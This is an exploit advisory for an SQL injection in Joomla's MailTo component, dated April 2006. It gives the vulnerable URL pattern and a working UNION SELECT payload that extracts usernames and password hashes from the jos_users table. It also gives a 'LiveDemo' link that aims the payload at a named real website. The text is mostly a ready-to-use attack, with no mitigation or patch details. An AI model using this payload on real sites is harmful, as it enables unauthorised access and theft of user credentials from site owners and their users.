Joomla MailTo SQL Injection

`#############################################################################  
# #  
# Joomla Component MailTo SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "MailTo (com_mailto)"   
[~] Date: "April 2006"  
  
########################################  
  
[~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1  
[~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1  
  
########################################  
  
[~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1  
  
########################################  
`